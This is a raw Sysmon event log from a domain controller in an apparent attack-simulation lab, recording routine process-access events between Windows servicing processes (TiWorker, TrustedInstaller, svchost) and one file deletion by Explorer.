12:02:26.134{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.119{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.119{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.119{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.119{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.119{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.119{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.103{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.103{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.103{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.103{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.103{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.088{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.088{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.088{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7e4dca80246863e3.customDestinations-ms~RF1b149.TMPMD5=6852E3A0BF1C01BB4DBFCB51C1A7C087,SHA256=74D6D8C58D0BEB0716EEECDC55366E193186924A616E057CD210F4104E5D85E9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.088{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.072{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.072{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.072{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 